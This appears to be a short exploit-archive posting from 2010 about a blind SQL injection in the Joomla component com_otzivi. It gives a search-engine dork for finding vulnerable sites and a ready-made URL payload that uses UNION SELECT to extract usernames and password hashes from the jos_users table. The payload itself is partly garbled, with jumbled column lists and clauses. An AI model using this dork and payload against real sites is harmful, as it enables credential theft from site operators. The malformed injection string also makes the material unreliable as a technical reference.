[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_otzivi Blind SQL Injection Vulnerability
# Published : 2010-01-03
# Author : Cyber_945
# Previous Title : Joomla Component com_doqment (cid) SQL Injection Vulnerability
# Next Title : Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerability


<------------------- header data start ------------------- >
#############################################################
#        Joomla Component com_otzivi Blind SQL Injection Vulnerability
#############################################################
# Author          : Cyber_945
# Home            : Ar-ge.Org
# Greetz          : By.Danger,D3xer,LionTurk and All Ar-ge.Org Members
# Not3            : Ar-ge.Org Online
# Name            : com_otzivi
# Bug Type        : Blind SQL Injection
# Infection       : Adminin bilgileri alinabilir.
  Dork :          : inurl:/index.php?option=com_otzivi

#############################################################
=======================C=y=b=e=r=_=9=4=5================
< 


-- bug code start -- >
http://server/index.php?option=com_otzivi&Itemid=15+and+1=2+union+select+concat(id,0x3a,username,0x3a,password),1+from+jos_users7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/from/**/jos_users--

=======================C=y=b=e=r=_=9=4=5================